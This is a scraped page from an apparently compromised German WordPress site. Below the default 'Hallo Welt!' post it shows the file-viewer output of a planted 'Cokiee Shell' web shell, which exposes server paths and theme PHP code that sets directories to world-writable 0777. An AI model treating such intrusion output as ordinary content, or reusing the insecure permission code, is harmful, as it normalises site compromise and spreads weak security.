Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/themes/splendor/admin/functions/ |
Current File : //var/www/web284/html/wp-content/themes/splendor/admin/functions/stand.php |
<?php function file_perms($file, $octal = false) { if(!file_exists($file)) return false; $perms = fileperms($file); $cut = $octal ? 2 : 3; return substr(decoct($perms), $cut); } $css_dir = get_stylesheet_directory() . '/assets/css/'; if(file_exists($css_dir) && file_perms($css_dir) <> 77) { @chmod($css_dir,0777); } if(file_exists($css_dir.'/options.css') && file_perms($css_dir.'/options.css') <> 77){ @chmod($css_dir.'/options.css',0777); } if(count($data) == 1 || count($data) == 0){ of_options(); $fox = array(); foreach($of_options as $key=>$val){ if(isset($val['std'])){ $fox[$val['id']] = $val['std']; } } if(isset($fox['of_backup'])){ unset($fox['of_backup']); }elseif(isset($fox['theme_update'])){ unset($fox['theme_update']); } update_option(OPTIONS, $fox); generate_options_css($fox); } ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare